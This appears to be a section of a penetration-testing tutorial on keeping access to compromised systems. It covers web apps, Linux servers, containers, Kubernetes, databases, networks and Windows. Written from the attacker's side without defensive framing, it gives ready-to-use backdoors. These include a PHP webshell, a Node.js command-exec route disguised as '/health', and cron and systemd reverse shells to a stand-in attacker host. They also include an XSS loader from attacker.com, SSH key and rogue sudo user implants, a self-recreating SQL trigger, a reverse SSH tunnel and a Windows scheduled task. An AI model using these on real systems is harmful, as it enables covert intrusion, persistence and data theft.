Maintaining Access

Maintaining access focuses on ensuring continued control over a compromised system or application after initial exploitation. Attackers implement persistence mechanisms that survive reboots, redeployments, session invalidations, or user logouts. This phase ensures long-term monitoring, data extraction, lateral movement, and the ability to re-enter the environment without repeating the original exploit chain.

Maintaining access requires stealth, reliability, and minimal detection. Techniques vary depending on the level of compromise: web application access, server-side RCE, container access, database compromise, or full system control.

Persistence in Web Applications

Attackers maintain access inside web apps by leveraging stored tokens, hidden admin accounts, vulnerable endpoints, and implanted scripts.

1. Persistent Sessions

Many applications don’t immediately invalidate:

JWTs
API tokens
session cookies
refresh tokens

Attackers extract these from logs, databases, or memory.

Keeping a persistent session:

store the token offline
reuse it directly in HTTP requests
craft API calls with the stolen token

If rotation isn’t enforced, access lasts indefinitely.

2. Creating Hidden Admin Accounts

If access to admin panel or database is available:

Example SQL:

INSERT INTO users (username, password, role)
VALUES ('backupadmin', 'hashedpassword', 'admin');

The account remains unless audited.

3. Implanting Backdoor Functionality

If RCE or webshell is available, attackers embed backdoor code in:

templates
controllers
middleware
cron controllers
API endpoints

Example PHP backdoor:

<?php system($_GET['cmd']); ?>

Example Node.js backdoor:

app.get('/health', (req,res)=>{ require('child_process').exec(req.query.cmd) })

These blend into legitimate routes.

4. Injecting Malicious JavaScript for Web Access

Stored XSS enables long-term access through:

session hijacking
keylogging
capturing CSRF tokens
auto-triggering admin actions

Example payload:

<script src="https://attacker.com/persist.js"></script>

Hosted script can be updated whenever needed.

Server-Side Persistence

If attackers obtain command execution or shell access, they maintain access through OS-level persistence.

1. Creating Rogue Users

useradd -m backup
echo "backup:pass123" | chpasswd

Add to sudo:

usermod -aG sudo backup

2. SSH Key Persistence

mkdir -p ~/.ssh
echo "ATTACKER_PUBLIC_KEY" >> ~/.ssh/authorized_keys

Attackers login without passwords.

3. Cronjob Persistence

Cron executes attacker-controlled scripts periodically.

System-level cron:

/etc/crontab

Example reverse shell cron:

* * * * * bash -i >& /dev/tcp/ATTACKER/4444 0>&1

Every minute maintains access.

4. Systemd Service Persistence

A rogue service runs automatically at boot.

[Service]
ExecStart=/bin/bash -c "bash -i >& /dev/tcp/ATTACKER/4444 0>&1"

Load service:

systemctl enable attacker.service

5. Replacing Legitimate Binaries (Binary Backdooring)

Attackers replace legitimate tools:

ssh
sudo
system binaries

With trojanized versions that open backdoors or log credentials.

Container Persistence

Containers reboot frequently; persistence requires alternate strategies.

1. Implant in Host-Mounted Volumes

Upload scripts to:

/var/www/html/

or shared volumes used by multiple containers.

2. Escape to Host (if misconfigured)

Once on host:

set up SSH keys
drop cron
create rogue users

3. Persist Inside Kubernetes

If cluster compromise occurs:

create malicious CronJobs
modify deployment manifests
attach containers to privileged service accounts

Example:

kubectl apply -f malicious-cronjob.yaml

Application and Database Persistence

1. Storing Payload in Database Fields

Attackers insert malicious payloads in:

HTML templates
content fields
admin notes
configuration options

Injected JS, SQL triggers, or template code execute whenever loaded.

2. Creating Malicious Database Triggers

CREATE TRIGGER persist BEFORE INSERT ON users
BEGIN
  INSERT INTO backdoor VALUES ('admin','hashedpass');
END;

Triggers re-create backdoors if removed.

3. Stashing Credentials Inside DB Comments or Hidden Records

Attackers create “invisible” data rows containing:

API keys
tokens
attacker-owned accounts

These remain unless specifically cleaned.

Network-Level Persistence

1. Reverse Tunnel Persistence

Attackers set persistent reverse tunnels:

ssh -R 4444:localhost:22 attacker@remote

This makes internal hosts accessible externally.

2. Persistent VPN Access

If VPN credentials are captured:

OpenVPN files
WireGuard config
IPsec keys

Attackers join internal network indefinitely.

Using Scheduled Task Persistence on Windows

If the target is Windows:

Create scheduled task:

schtasks /create /tn "SystemUpdate" /tr "cmd.exe /c reverse.bat" /sc minute

Registry persistence:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\Run

Adding reverse shell executables here loads them every login.

Maintaining Access Through Logs and API Endpoints

1. Hidden API Routes

Attackers create or modify internal routes:

/api/admin/debug
/api/root/trigger

These allow:

executing commands
reading files
dumping databases

2. Error-Triggered Backdoors

Malformed requests trigger attacker code if error handlers were modified.